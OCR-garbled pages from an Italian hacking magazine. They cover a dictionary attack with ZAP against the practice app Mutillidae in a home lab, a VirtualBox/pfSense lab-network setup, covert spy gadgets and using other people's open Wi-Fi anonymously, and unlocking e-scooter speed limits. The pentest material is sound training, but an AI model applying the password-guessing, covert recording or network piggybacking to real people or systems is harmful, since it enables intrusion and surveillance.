inviati attraverso il “tunnel” e ciò https://privatevpn.com/
garantisce l’occultamento appunto • Hotspot Shield – app sicura Cliccando su Scarica Windscribe
della posizione e dell’indirizzo IP e, e veloce e offre 500 MB gratis al si potrà scegliere se installare l’app
quindi, la navigazione in anonimato. giorno. www.hotspotshield.com/vpn/ per Android, iPhone o PC.
@

Spyphone senza SIM

Uno dei punti dolenti per chi vuole wardriving. Si tratta di una mappatura
costruire il perfetto “telefonino dell’hacker” delle reti Wi-Fi che si potrebbero definire
è la questione connessione. Si può “penetrabili” o aperte. Non è questo lo
ricorrere all’uso di una SIM ma questo scopo dell'articolo e quindi ci limiteremo
cancellerebbe ogni possibilità di rimanere a indicarvi una delle app usate per questo
anonimi, dato che le schede sono obiettivo, che ha tutto un altro scopo.
nominative e registrate. Bisognerebbe Si chiama Wigle Wifi Wardriving, è Open
comprarne una online, ma ciò porterebbe Source e, come recita la descrizione sul Play
a compiere un reato. Come fare, quindi? Store di Google, consente di “individuare
Sfruttando una rete Wi-Fi, naturalmente. sulla mappa qualsiasi rete wireless o
Non la propria, certo, ma una rete libera. mobile in tutto il mondo” e “di alimentare
Il problema che si deve risolvere però, è automaticamente questa preziosa risorsa
Il tool può essere usato
da un malintenzionato per
quello di individuarla di volta in volta. Beh, comune”, riferendosi alla Rete. Per altre
sfruttare la rete altrui. è possibile ricorrere alla tecnica del info, puntate il browser su www.wigle.net
 SPIONAGGIO

Dov’è il telefono spione?!

Necessario per ogni hacker Ciò è fattibile abilitando
che utilizzi il proprio telefonino la funzione Posizione del
per seguire/spiare una proprio smartphone
persona è la possibilità Android. Grazie a
di rintracciare il proprio quest’ultima, dal servizio
dispositivo (o il soggetto che Trova il mio dispositivo
lo porta con sé) in ogni (raggiungibile all’URL http://bit.
momento. Questo può ly/trovailmiotelefono) è
avvenire sfruttando il servizio possibile determinare con Oltre a individuare la posizione del telefono spia, con
di localizzazione messo precisione la posizione del la funzione “Trova il mio dispositivo” di Google è possibile

s
bloccare il dispositivo o resettarlo.
a disposizione da Google. nostro “cavallo di Troia”.

ew
Attenti a quei 5 dispositivi
UNA PENNA CHE IL CARICABATTERIA
SENTE TUTTO GUARDONE
_n
Sembra un bell’oggetto ma se si svita C’è chi le pensa davvero tutte. Sembra
la parte inferiore si trova un un classico alimentatore a cui collegare
connettore USB. Difatti un cavo USB per ricaricare il cellulare,
questa penna nasconde ma in realtà nasconde una microcamera
al suo interno una con risoluzione 1080p, un modulo Wi-Fi
memoria da ben 32 GB Il caricabatteria e uno slot per l’inserimento di schede di
spia lo trovi
lia

ed è in grado di agire memoria SD. Trasmette le immagini sullo

su bit.ly/
da registratore vocale. caricabatteriespia smartphone grazie a un’apposita app e ha
Occhio alle penne a circa 30 €. la funzione di rilevamento del movimento.
lasciate per errore
in sala riunioni
al termine
La penna-spia SPIA... CHIAVI IN MANO!
ita

di un incontro... la trovi su
http://bit.ly/ Una normale chiave per auto? Macché! Ha al suo
pennaregaudio
a poco meno interno una videocamera da 1080p che registra
di 40 €. a 30 fps. È dotata della funzionalità Motion
Detection e garantisce la registrazione anche La chiave
la trovi su
in ambienti bui, grazie alla visione notturna http://bit.ly/
@

a infrarossi. La sua batteria dura all’incirca chiavispia

MOUSE CON LE ORECCHIE 90 minuti e supporta la registrazione in loop. a 42 €.
Sui maggiori siti Web è etichettato
come “mouse ottico con microspia
ambientale GSM”. Costa circa 70 € e IL CAVO USB CON
ha al suo interno una SIM. Ogni volta
che si telefona al numero introdotto,
LA SIM DENTRO
il dispositivo risponde, senza Sembra un normale cavo di ricarica USB
emettere suoni. Può essere ma in realtà ha in dotazione un
Il mouse spia
lo trovi su usato come un normale micro-telefono che funziona sulle
bit.ly/mousespia mouse e ha un’autonomia frequenze di 850 MHz, 900 MHz,
a circa 70 €. 1.800 MHz o 1.900 MHz, con tanto di
in ascolto di 2/3 ore.
microfono per la ricezione, localizzatore
Lo spy-cable lo trovi
su http://bit.ly/cavospia. GSM e rilevatore di rumore. Ed esiste
Ci sono tanti modelli anche la possibilità di telefonare
più o meno simili
o di farsi telefonare dalla SIM inviando
a un prezzo
che oscilla un semplice SMS.
tra i 9 e i 20 €.

31
SICUREZZA

SETTIMA PARTE

s
Attacco
ew
a d i z i o n a r i o !
es ta pu nt at a im pa re rete a portare avanti
GLOSSARIO In qu ntro Mutillidae!
_n
un di ct io na ry at ta ck co
DI BASE

P
LOG POISONING roseguiamo la verifica con numerose tipologie di attacchi,
Sotto questo nome ricade di sicurezza che stiamo diretti verso i diversi servizi offerti
quella classe di attacchi conducendo sulla rete dalla rete: nell’ultima puntata, in
lia

basati sull’iniezione di codice che abbiamo denominato particolare, abbiamo preparato un

malevolo all’interno dei file “palestra per pentester”, ovvero dictionary attack contro la pagina
di log prodotti da un sistema
l’ambiente virtuale che utilizziamo di login della Web app Mutillidae”.
nel corso del suo
funzionamento ordinario. per affinare le nostre skill da
penetration tester in erba senza il DICTIONARY ATTACK
ita

LOCAL FILE INCLUSION rischio di incorrere in problemi legali. Sebbene attacchi di questo tipo
È il nome di un attacco Nel corso della verifica abbiamo – caratterizzati da un elevato tasso
teso a esfiltrare i file avuto la possibilità di confrontarci di ripetitività e affidati quasi
contenuti nel filesystem
locale di un server Web
figura #1
@

(che, è bene sottolineare,

in condizioni normali non
dovrebbero essere accessibili
all’utente Web) sfruttando
un’apposita vulnerabilità
della Web application,
generalmente legata
a un insufficiente controllo
di un input utente.

REMOTE COMMAND
EXECUTION
Gli attacchi di tipo RCE
consentono a un attore
malevolo di forzare
l’esecuzione di comandi
arbitrari su un server remoto. Ecco come accedere alla pagina che riporta tutti
gli utenti locali della Web app.
32
 PENETRATION TEST
Il codice del nostro script figura #2
Python per l’estrazione
dell’elenco di utenti da
attaccare.
completamente a strumenti
automatici – siano spesso
considerati nell’immaginario
collettivo più adatti a script kiddies
che a un professionista del
settore, nella pratica possono

s
rivelarsi un’arma aggiuntiva
preziosa per un pentester,
fornendo credenziali per l’accesso

ew
al sistema target sfruttabili
successivamente nei task
a maggior tasso tecnico. Tutto
questo a patto che le attività
preparatorie all’attacco siano
svolte con la necessaria cura:
_n
per condurre un dictionary
attack (attacco a dizionario)
in maniera professionale (al fine
di massimizzare le chance adeguata, che non può definite sul sistema e da una
di successo) è necessaria prescindere dall’analisi scelta consapevole e ponderata
lia

innanzitutto una pianificazione (e l’enumerazione) delle utenze già della wordlist da adottare.

d i t e s t c o m p l e t o
Un ambiente
ita

Rete
Internet 211.100.1.2 Target
@

Backbone
211.100.1.1 Server
212.100.1.3 FTP
Router
212.100.1.1

210.100.1.2
212.100.1.2
Pentester Server
210.100.1.1 Web

All’URL https://bit.ly/hj_palestra
trovate le istruzioni per creare
la palestra virtuale. 33
SICUREZZA
ENUMERAZIONE DEGLI forniti da Metasploit (ovvero quello Il risultato
UTENTI reperibile al percorso /usr/share/ dell’esecuzione dello
Gran parte del lavoro visto nello wordlists/http_default_ script.
scorso numero è stato focalizzato password.txt della VM Pentester),
proprio su queste operazioni: con lo scopo di rompere
l’enumerazione degli utenti di
Mutillidae e la scelta della wordlist.
le password degli utenti più
vulnerabili (in altri termini,
figura #3
Più precisamente, abbiamo per cogliere i cosiddetti “low-
proceduto a: hanging fruit”) prima di raffinare
• individuare una pagina della Web ulteriormente il nostro attacco.

s
app che – nell’offrire una
funzionalità di blogging – mette USIAMO ZAP
“gentilmente” a disposizione una Una volta ottenuta la lista degli

ew
select list per la scelta dell’utente utenti e la wordlist da utilizzare,
di cui visionare i post [figura #1]; non ci resta che avviare il tool per il
• estrarne il codice HTML; dictionary attack. Stiamo parlando
• realizzare uno script Python di ZAP (Zed Attack Proxy), il
ad hoc [figura #2] per effettuare software Open Source di OWASP scanner per Web app e, tra le varie
il parsing di tale codice, estrarre che abbiamo già utilizzato in altre funzionalità, dispone di un modulo
_n
la lista degli utenti e formattarla occasioni. ZAP è un vulnerability di fuzzing tanto ben sviluppato
nel formato richiesto dai tool
d’attacco [figura #3];
• scegliere un dizionario non
figura #4
eccessivamente corposo tra quelli
lia

Mutillidae
Mutillidae è una Web
ita

application didattica, Open La schermata di ZAP per l’esplorazione manuale

Source e liberamente
installabile da chiunque
della Web app.
intenda migliorare le proprie
capacità di pentester. Rispetto
ad altre Web app simili (come
@

Damn Vulnerable Web

Application – DVWA, che figura #5
abbiamo visto nelle puntate
precedenti) si contraddistingue
per il suo approccio basato
sulle vulnerabilità appartenenti
alla lista denominata OSWAP
Top 10, che racchiude le 10
falle più diffuse in ambito Web.
Sotto questo profilo Mutillidae
ci offre un ambiente
addestrativo privilegiato,
consentendo di confrontarci
con le diverse incarnazioni di
ciascuna delle vulnerabilità
incluse nella OSWAP Top 10. Simulando un login fallito indicizziamo la relativa
richiesta HTTP all’interno di ZAP.

34
 PENETRATION TEST
quanto versatile: dopo averlo visto
all’opera in diversi scenari (dalla
figura #6
creazione di richieste multiple
nell’ambito di un attacco DoS alla
modifica dei cookie passati con
le richieste HTTP al fine di aggirare
i meccanismi di autenticazione)
è tempo di impiegarlo anche
nell’ambito di un dictionary attack.
Avviamo quindi lo scanner,

s
selezionando il percorso 03 – Web
Application Analysis | ZAP dal
menu d’avvio della distribuzione

ew
e ignoriamo l’eventuale finestra
che ci richiede di utilizzare una
sessione persistente. La pagina di login, indicizzata da ZAP unitamente ai
parametri forniti alla Web app nel corso del nostro
ESPLORAZIONE MANUALE tentativo d’accesso.
Prima di attaccare la pagina
_n
di autenticazione dobbiamo principale di ZAP; al server target;
indicizzarla all’interno di ZAP, • inserire nel campo URL to • provare a effettuare il login con
effettuando un tentativo di explore l’URL (http://www. credenziali arbitrarie [figura #6],
accesso: in questo modo, il tool labpentest.hj/mutillidae/index. quindi chiudere il browser.
“catturerà” la richiesta HTTP php?page=login.php) della pagina
lia

necessaria a effettuare il login alla di login [figura #4]; AVVIO DEL FUZZER
Web app, che poi potrà essere • premere il pulsante Launch Una volta completate queste
passata al fuzzer per l’esecuzione browser, avviando un browser operazioni, torniamo alla
dell’attacco. A tal fine è necessario: già configurato per utilizzare ZAP schermata principale di ZAP
• selezionare l’icona con il fulmine come proxy, consentendo allo per accedere alle richieste HTTP
ita

su sfondo verde posta all’interno scanner di tracciare ogni richiesta catturate nel corso della nostra
del pannello destro della finestra HTTP (e la relativa risposta) inviata breve sessione di navigazione.
Clicchiamo con il tasto destro sulla

figura #7 richiesta inviata a seguito del

tentativo di login (è semplice da
@

individuare, in quanto dovrebbe

essere l’unica effettuata con il
metodo POST), che dovrebbe
avere un nome simile a
“POST:index.php(page) (login-php-
submit-button,password ...”
[figura #7] e selezioniamo dal
menu contestuale Attack | Fuzz.
In questo modo il fuzzer
visualizzerà in una finestra
dedicata la richiesta HTTP
originale, pronta per essere
utilizzata quale base per
La richiesta corrispondente al nostro tentativo di login. il nostro attacco.

35
SICUREZZA

figura #8 selezione dei Payloads,

aggiornata con le indicazioni
appena fornite.

La schermata LA WORDLIST
per inserire nel Ci manca solo un ultimo step:
fuzzer l’elenco chiedere a ZAP di utilizzare le
degli utenti password inserite nella wordlist
della Web app. che abbiamo scelto. A tal fine,
selezioniamo la stringa provA che

s
abbiamo utilizzato quale valore
della password nel corso della
nostra sessione di navigazione

ew
figura #9 e reiteriamo i medesimi passi visti
prima. L’unica differenza, in
Utilizzando il questo caso, sta nella tipologia del
payload Strings payload da utilizzare: se in
abbiamo inserito precedenza ci siamo accontentati
tutti gli utenti del payload Strings, copiando
_n
nel fuzzer, in e incollando l’output dello script,
modo che provi in questo caso possiamo più
a individuarne comodamente scegliere il payload
la relativa File, che ci consente di limitarci
password. a specificare il percorso della
lia

wordlist da usare, /usr/share/

wordlists/http_default_
password.txt [figura #10],
PAYLOAD text area con etichetta Contents lasciando che ZAP ne estragga
Come possiamo notare in [figura gli username estratti dal codice i contenuti per conto nostro.
ita

#7], i parametri di login che HTML della pagina dei blog [figura
abbiamo inserito corrispondono #9]. Confermiamo quindi le nostre ALL’ATTACCO!
alla stringa prova (username) scelte cliccando il pulsante Add: Finalmente siamo pronti per
e provA (quale password). ZAP ci riporterà alla finestra di l’attacco: ce lo conferma la stessa
Selezioniamo il primo valore interfaccia di ZAP, che riporta – ben
@

e premiamo Add per sostituirlo,

di volta in volta, con uno degli figura #10
username che vogliamo attaccare.
In questo modo ZAP ci mostrerà
una seconda finestra [figura #8] Per le password,
per la selezione della tipologia invece, optiamo
di payload da utilizzare: grazie al per il payload File,
nostro script disponiamo di una utilizzando una delle
lista già formattata (che dobbiamo
wordlist presenti
semplicemente selezionare
nativamente in Kali.
e copiare dall’output del
programma), quindi è sufficiente
cliccare il pulsante Add e scegliere
la voce String, copiando poi nella

36
 PENETRATION TEST
figura #11
Il fuzzer \
pronto
a effettuare
il nostro
dictionary
attack.
Tre anni
di galera

s
Chiunque abusivamente

ew
si introduce in un sistema
evidenziati – i due parametri da FILTRARE I RISULTATI informatico protetto da misure
modificare nel corso della nostra Una volta completato l’attacco, di sicurezza ovvero vi si
sessione di fuzzing [figura #11]. Per è il momento di filtrare i risultati, mantiene contro la volontà
avviare l’attacco, non ci resta che per verificare se ZAP sia riuscito espressa o tacita di chi ha il
premere il pulsante Start fuzzer a individuare una o più password diritto di escluderlo, è punito
_n
e attendere che il tool compia il degli utenti dell’applicazione. con la reclusione fino a 3 anni.
proprio lavoro. La progressione Si tratta di un’attività per lo più
dell’attacco ci viene mostrata manuale: al contrario di altri tool Cosa significa questa frase, vista
attraverso un’apposita barra di disponibili in ambito Open Source, nell’ottica di un penetration
avanzamento, mentre i diversi il fuzzer di ZAP non dispone, tester? La risposta è semplice:
lia

valori di payload inviati alla Web infatti, di funzionalità avanzate per quanto buone possano
app sono di volta in volta aggiunti di filtraggio che ci aiutino in questa essere le vostre intenzioni, mai
da ZAP in coda all’elenco posto circostanza. Se osserviamo eseguire un penetration test
nella parte inferiore della finestra con attenzione l’output del fuzzer, (o anche solo una parte di esso)
[figura #12]: come possiamo tuttavia, notiamo come per ogni su sistemi che non siano di
ita

notare, il vulnerability scanner richiesta HTTP inviata al server vostra proprietà, a meno che
associa a ogni tentativo di login (ovvero per ogni coppia non disponiate di un apposito
un ID unico, che identifica username,password provata) ZAP permesso scritto da parte di tutti
in modo univoco la coppia ci mostri una serie di informazioni i proprietari dell’infrastruttura
(username,password) di volta di sintesi sulla relativa risposta, da testare. Ovviamente, per
@

in volta utilizzata. “permesso scritto” non stiamo

figura #12 parlando certo di una semplice
mail (soluzione che qualcuno
potrebbe proporvi), ma piuttosto
di un documento formale
Il dictionary
(la cosiddetta manleva) in cui si
attack
stabilisce, tra l’altro, quali siano
in corso.
i sistemi da testare, che tipo
di test effettuare e i vincoli
a cui dovete attenervi. È questo
documento (e il rispetto dei
relativi termini) che differenzia
un penetration tester (ovvero
un professionista) da un volgare
pirata informatico.
SICUREZZA
tra cui il codice HTTP (Code),
figura #13
la dimensione dell’header
(Size Resp. Header) e la
dimensione del body della
risposta (Size Resp. Body).
Si tratta di un buon punto
di partenza per la nostra indagine:
in linea di massima, infatti, le Confrontando le due righe evidenziate, possiamo
pagine “private” ottenute a seguito dedurre che il login con password “password”
del login sono differenti da quelle è andato a buon fine...
in cui il login viene negato,

s
per cui almeno uno di questi
parametri dovrebbe variare figura #14
quando ZAP “indovina”

ew
le credenziali corrette
per un account.

PASSWORD BUCATE
Alla luce di queste conclusioni,
disponiamo di un primo criterio
_n
per distinguere i tentativi di login
coronati da successo da quelli
ottenuti in risposta all’invio di
credenziali sbagliate. Non ci resta
che scorrere con attenzione
lia

l’output del fuzzer, consultando ...come confermano i contenuti della risposta HTTP.
con attenzione le tre voci che
abbiamo segnalato. Fintanto che di login effettuati per un (codice 302 contro il codice 200
le credenziali inviate a Mutillidae medesimo username risultano dei restanti tentativi – [figura
saranno sbagliate, i valori associati infatti successivi l’uno all’altro, #13]). Che si tratti della “pistola
ita

a tale voce dovrebbero rimanere consentendoci di scorrere fumante” che stiamo cercando?
costanti: al contrario, una volta velocemente le righe alla ricerca
“bucata” la password dell’utente di una qualche variazione dei LA CONFERMA
corrente, dovremmo osservare campi d’interesse. In ogni caso, Per verificarlo dobbiamo accedere
una modifica di almeno uno non stiamo parlando di un ai contenuti della risposta HTTP
@

dei valori in questione, segno processo immediato: dobbiamo fornita dal server Web a seguito
per l’appunto che “qualcosa esaminare tutte le righe relative dell’invio delle credenziali in
è cambiato”. agli utenti admin e adrian prima questione: una volta selezionata la
di individuare qualcosa che possa relativa riga all’interno dell’output
ANALISI MANUALE richiedere un supplemento del fuzzer, possiamo premere
Di default, l’output del fuzzer è d’analisi. Più precisamente, il pulsante Response (nel pannello
ordinato sulla base del cosiddetto possiamo notare una certa in alto a destra) per accedere
Task ID, un valore numerico discontinuità tra la riga relativa all’intero contenuto della risposta,
univoco che identifica alla coppia di credenziali header HTTP inclusi. In questa
cronologicamente il tentativo (john,password) e quelle contigue: sede siamo interessati
di login effettuato. Nel nostro oltre alle dimensioni dell’header esclusivamente al body, costituito
caso, questa scelta di design e del body, anche il codice HTTP dal codice HTML della pagina
ci torna piuttosto utile: secondo restituito dal server Web risulta richiesta: come possiamo notare
l’ordinamento di base, i tentativi decisamente diverso dagli altri [figura #14], indica chiaramente

38
 PENETRATION TEST
che l’utente di nome john accade con l’utente john, infatti, CODICE 302
ha effettuato il login alla una volta individuata la Al contrario, il codice HTTP
Web application. Bingo! password corretta (che, a restituito dal server Web è l’unico
proposito, anche in questo caso elemento a cambiare
ALTRI RISULTATI è coincidente con la stringa esclusivamente a seguito dell’invio
E non finisce qui: è sufficiente “password”) anche le richieste delle credenziali corrette: in linea
proseguire il nostro esame successive producono una di massima il server risponde alle
manuale per verificare come risposta HTTP caratterizzata nostre richieste con il codice 200
l’utente john non sia l’unico dalla medesima dimensione. “OK”, ma solo quando il fuzzer
a essere stato “bucato”: Attraverso il meccanismo della “indovina” la password
la medesima sorte è toccata, sessione, infatti, Mutillidae dell’account corrente (ovvero

s
tra gli altri, anche agli utenti “ricorda” l’identità che si invia al server la coppia
jeremy [figura #15] e bryce è autenticata correttamente, di credenziali corrette) ci viene
[figura #16]. al di là dei successivi tentativi restituito un codice diverso,

ew
Vale la pena soffermarsi di login effettuati senza successo 302 “Found”. Cosa succede,
sull’output del fuzzer relativo a per il medesimo utente. allora, se proviamo a ricercare
questi due utenti: al pari di quanto questo codice all’interno
dell’output del fuzzer?
figura #15
UTENTI VIOLATI
_n
Possiamo farlo in due modi:
utilizzando la funzionalità
di ricerca del fuzzer, messa
a disposizione tramite il pulsante
Search, oppure – più
lia

Scopriamo che anche l’utente jeremy è stato violato. semplicemente – ordinando

l’output sulla base del campo
figura #16 Code. Se optiamo per un
ordinamento decrescente, i primi
risultati a essere visualizzati
ita

saranno proprio quelli che hanno

prodotto una risposta HTTP con il
codice 302: ovvero tutti gli utenti
di cui abbiamo scoperto la
La stessa sorte è toccata all’utente bryce: password [figura #17]! Stiamo
@

il suo account è stato bucato. parlando di ben 10 utenti sui 17

forniti in pasto a ZAP: non c’è che
figura #17 dire, si tratta certamente di un
ottimo risultato, reso possibile
anche dalla palese assenza di una
password policy decente (avete
notato che la password – a dir
poco banale – scelta da tutti
i 10 utenti coincide con la stringa
“password”?). Certo, al momento
Ordinando i risultati del fuzzer sulla base del codice
ci è sfuggito l’obiettivo più
HTTP della relativa risposta possiamo ottenere importante (l’utente admin),
in maniera immediata l’elenco degli utenti violati, ma per rompere la sua password
e la relativa password. c’è la prossima puntata...

39
 SICUREZZA

RETI
PRIMA PA
RT E

VIRTUALI
IN AZIONE

s
basa sull’uso

ew
l p en te st in g d i H J si
La serie su ve ramente cosa
ir tu al i. M a sa p et e
di macchine v
o e co m e si cr ea n o ? Scopritelo con noi
son

V
_n
irtualBox (www. distruggerla e ricostruirla in base
GLOSSARIO virtualbox.org) alle vostre esigenze senza
DI BASE è un emulatore interferire con i collegamenti a
NAT per creare macchine Internet degli altri membri della
Network Address Translation, virtuali ma anche reti virtuali famiglia o dell’ufficio. Di default,
lia

che in italiano sarebbe autocontenute all’interno del vostro le macchine virtuali di VirtualBox
“traduzione degli indirizzi computer. Questo software ha usano la connessione NAT.
di rete”, è una tecnica potenzialità molto maggiori, però, e Il problema è che in questo modo
che consiste nel modificare
può anche creare reti di laboratori gli altri computer sulla vostra rete
gli indirizzi IP contenuti
virtuali collegati a Internet che principale non possono
ita

negli header dei pacchetti

in transito su un sistema possono comunicare tra loro (come comunicare con le VM sulla vostra
che agisce da router all’interno facciamo fin dalla prima puntata macchina. Potete cambiare questa
di una trasmissione tra due nella nostra serie sul pentesting). impostazione e aggiungerle alla
o più host.
Dando per scontato che sappiate vostra rete locale aprendo VM
come installare VirtualBox, e anche network connection in VirtualBox
@

FREEBSD
FreeBSD è un sistema che siate in grado di creare una e selezionando la modalità Bridged
operativo UNIX libero macchina virtuale, tema trattato per la connessione di rete. La VM
derivato dalla Berkeley più volte, cominciamo. è così nella stessa rete degli altri
Software Distribution (BSD) computer e ottiene un indirizzo IP
ed è disponibile per un gran
RETI COMUNICANTI dal server DHCP locale. È, però,
numero di architetture.
È usato soprattutto in ambito Con VirtualBox l’utente può parte della rete principale.
server/networking/firewall controllare all’interno della sua rete
per la sua scalabilità e stabilità. di test tutto ciò che non può fare CONFIGURATE L' INDIRIZZO IP
con un router chiuso di un fornitore La prima cosa che dovete fare per
di servizi Internet, incluso gestire creare una rete isolata è assicurarvi
autonomamente i protocolli DHCP, che la vostra workstation VirtualBox
DNS e TFTP. Creare una nuova rete abbia un indirizzo IP statico, se
virtuale separata per sperimentare possibile. Questo vi fa risparmiare
è pratico: potete usarla, molto lavoro, perché il resto della

40
 VIRTUAL MACHINE
rete deve sapere come accedere scheda di rete figura #1
a quella di test e un IP dinamico virtuale come
lo rende difficile. La maggior parte Bridged (collegata
dei router permette di mappare alla rete locale)
staticamente gli indirizzi MAC a IP, e la seconda come
creando di fatto IP statici. In questo Internal Network
modo dite a tutte le macchine sulla e intnet. In questo
rete locale che per accedere modo avete un
a quella isolata devono inviare accesso a entrambe
il traffico al router VirtualBox le reti e pfSense
che state per creare. Per gestire vi permette di gestire

s
il routing e i firewall in questa guida la comunicazione
useremo la distribuzione pfSense, tra le due.
che offre sicurezza e affidabilità. Prima di attivare

ew
Un router pfSense con configurazioni sia per la
Potete scaricarla all’indirizzo www. la VM, collegatele rete WAN sia LAN. Se WAN è impostato su DHCP
pfsense.org/download/. Estraete l’immagine ISO di questi dati possono cambiare: attenzione!
il file ISO e create una nuova VM. pfSense scaricata
PfSense è basata su BSD, quindi prima. Dopo l’avvio, eseguite per dopo. Dovreste avere anche
dovete selezionare come tipo di l’installer. Tenete per ora tutte un indirizzo WAN e uno LAN
macchina 64-bit FreeBSD. Abilitate le impostazioni predefinite assegnati dal DHCP. Nel caso uno
_n
i primi due adattatori di rete per e spegnete la macchina virtuale, di essi dovesse essere assente,
la VM. I requisiti per FreeBSD sono ricordandovi di staccare dovete ripetere i passaggi
molto modesti: 512 MB di RAM il supporto di installazione. Una precedenti. Il vostro prossimo
e una vCPU con un disco da 8 GB volta riavviato il router pfSense sarà compito è impostare una VM
sono più che sufficienti. simile alla schermata riportata in all’interno della vostra rete isolata.
lia

È importante impostare la prima [figura #1]. Segnatevi l’indirizzo LAN Create un desktop Ubuntu (o di un
altro flavour di Linux) e impostate
l’adattatore di rete su quella
di VirtualBox, intnet. Dovreste

sull ’ uso dei firewall

Alcune note sull’ ricevere un indirizzo DHCP dal
ita

router appena installato perché

Anche se quanto descritto nel in base alle vostre esigenze. è l’impostazione predefinita
corpo dell’articolo si può ottenere La configurazione usata qui per i laboratori virtuali; potete
usando un instradamento è completamente aperta modificarlo in seguito.
standard con un router Linux, e non ci sono restrizioni tra le reti,
Aprite il browser della nuova
@

usare un firewall e il routing quindi può essere utilizzata

VM e inserite l’indirizzo IP
insieme dà un maggiore controllo solo in questo caso, perché
sugli accessi. Vi permette, per la rete è solo interna. del gateway della LAN che
esempio, di restringere il traffico Non adottate una configurazione avete segnato prima. Entrate
in ingresso e in uscita in base alle di questo tipo sulla zona la prima volta nel sistema pfSense
vostre esigenze, limitandoli magari demilitarizzata perché potreste con le credenziali admin e pfsense.
alla connessione HTTP/HTTPS avere delle conseguenze molto
Alla prima apertura la pagina Web
oppure a qualsiasi porta serie. È da notare il fatto che, se
o protocollo sia richiesto. non c’è il segno di spunta per la
di pfSense avvia un wizard.
Se aggiungete altre reti rete BOGON, è possibile gestire Lasciate tutte le impostazioni
nell’installazione successiva potete il firewall dalla rete locale predefinite tranne l’opzione di
regolare anche l’accesso tra di entrando nell’interfaccia della rete cambiare l’indirizzo DNS utilizzato.
esse. Parte dell’efficacia dell’intera WAN e facendo il login con lo Potete così, se volete, utilizzare un
infrastruttura virtuale è che può username e la password di
servizio DNS che rispetta la privacy
essere semplice o complessa pfSense utilizzati in precedenza.
come Cloudflare (1.1.1.1) o Quad9
(9.9.9.9) e allo stesso tempo

41
 SICUREZZA
configurare i dettagli del dominio Reload per attivare le modifiche. Reti multiple
locale. Al quarto passaggio, dovete Questa impostazione non è sicura,
togliere la spunta a Block RFC1918 ma per un’infrastruttura interna Più reti virtuali possono
Private Network se volete si può usare. Ripetete la procedura coesistere, se non ci sono
modificare le regole del firewall usando l’interfaccia LAN. Usate conflitti. Dovete solo assicurarvi
che i range di indirizzi IP del
di pfSense rispetto a quelle infine il comando route per
DHCP non vadano in conflitto
della rete principale. Completate consentire ai computer sulla vostra e che il routing sia configurato.
l’installazione premendo il pulsante rete locale fisica di accedere Invece di ricreare tutto da zero,
Reload quando arrivate al termine a quella isolata. Dovete usare usate VirtualBox per clonare
della procedura guidata. il comando per ogni macchina da la rete pfSense.
collegare, con le variazioni legate

s
TESTATE IL COLLEGAMENTO al sistema operativo. Su un desktop
Verificate poi che le macchine con Linux usate il comando che il traffico che deve essere mandato
virtuali della rete di test si segue (come utenti root o con alla rete isolata può essere inviato

ew
colleghino ai siti Internet esterni. sudo). Sostituite ai dati della rete all’indirizzo IP 10.0.0.55. Questi
Dopo averlo fatto dovete apportare dopo ip route add quelli della LAN comandi rimangono attivi durante
delle modifiche a livello del firewall. che avete annotato in precedenza. la sessione corrente della macchina
Di default, tutto il traffico WAN in 10.0.0.55 in questo esempio è e si perdono al riavvio. Per renderli
entrata è bloccato. Aprite la pagina l’interfaccia WAN, presa ancora una permanenti dovete avere privilegi
Web della VM di pfSense ed entrate volta dalla schermata di pfSense. da amministratore e consultare
_n
in Firewall > Rules > WAN. Fate la documentazione del vostro
click sulla freccia verde rivolta verso ip route add 192.168.0.0/24 sistema operativo, perché le
l’alto e inserite le impostazioni via 10.0.0.55 implementazioni possono variare.
desiderate. In [figura #2] potete Se avete bisogno di eliminarli
vedere come far passare tutto il Su un computer con Windows potete usare, per esempio
lia

traffico in entrata e uscita. Premete il comando sarebbe (sempre

con privilegi da amministratore): route del 192.168.0.0

route add 192.168.0.0 mask Se l’indirizzo WAN di pfSense

Un esempio di come configurare
continua a cambiare, dovete
ita

255.255.255.0 10.0.0.55
il firewall WAN per consentire
tutto il traffico in ingresso e in rimuovere il vecchio comando
uscita. Con queste impostazioni In questo modo dite alla macchina route e aggiungerne uno nuovo
non ci sono restrizioni, quindi su cui state lavorando che tutto con l’indirizzo aggiornato.
vanno usate con cautela. Per questo serve la mappatura.

figura #2 Dovete completare questo

@

processo su tutte le macchine che

devono raggiungere il laboratorio.
L’amministratore potrà quindi
collegarsi via SSH, RDP, FTP
o altro al vostro laboratorio virtuale
dalla rete locale.

Nel prossimo
numero
Creeremo una struttura di rete più articolata
per il nostro laboratorio virtuale.

42
 s
ew
_n
lia

HOW TO
ita

serial hacking Monopattini con il turbo

@

C’è chi ha trovato il modo per aggirare le nuove limitazioni imposte dai produttori di e-scooter....... 44

videosorveglianza Registra con la motion detection

Un sistema di videosorveglianza ideale per la sicurezza.............................................................................48

filesystem Alla scoperta di NTFS, quarta parte

Chi ha detto che un file cancellato lo è “per sempre”?................................................................................. 52
 HOW TO

MONOPATTINI
C’è chi ha trovato il modo
per aggirare le nuove
limitazioni imposte
dai produttori

CON IL TURBO
di e-scooter.
Vi sveliamo i retroscena
della questione

s
IN BREVE monopattini elettrici sono entrati massima più contenuta. Qualcuno,
prepotentemente a far parte della però, non ha perso tempo è ha trovato

ew
Ecco come gli
nostra quotidianità. Sono in molti il modo per aggirare tali limitazioni.
smanettoni sbloccano
i monopattini, in barba a usare l’e-scooter come mezzo
alle nuove normative. di trasporto per percorrere brevi METTONO MANO AL CODICE SERIALE
e medie distanze in modo agile La procedura per lo sblocco di tutti
DIFFICOLTÀ
e, soprattutto, sostenibile. Proprio i monopattini di marca “XIAOMI”
per queste sue caratteristiche, e “NINEBOT by Segway”, in vendita
_n
il monopattino si sta diffondendo in Italia, è stata resa nota dalla
sempre di più nei circuiti cittadini community di Scooterhacking,
GLOSSARIO e rappresenta un passo in avanti verso un gruppo di informatici appassionati
DI BASE la svolta green, una valida alternativa di monopattini. Per mettere in atto
a mezzi di trasporto più tradizionali e le loro malefatte, gli smanettoni di
lia

BLUETOOTH meno ecologici. Nonostante la velocità Scooterhacking non intervengono sul

Tecnologia di connettività contenuta, la circolazione su strada firmware del monopattino, bensì vanno
utilizzata per controllare
di questi e-scooter non è priva di rischi a modificare il codice seriale del
gli e-scooter tramite app
e pericoli. Per questo motivo si è resa dispositivo. Così facendo riescono
installate su dispositivi
necessaria di recente l’introduzione a sbloccare la velocità massima che
ita

mobile con sistema operativo

Android e iOS. di nuove normative più stringenti il microveicolo può raggiungere. Si tratta
e limitanti. Tra le principali novità di una modifica sicura, efficace e
FIRMWARE c’è un abbassamento del limite massimo incredibilmente semplice. La redazione
Software di base di un
di velocità a 20 km/h. In seguito a questa è riuscita a intervistare un membro
dispositivo elettronico, come
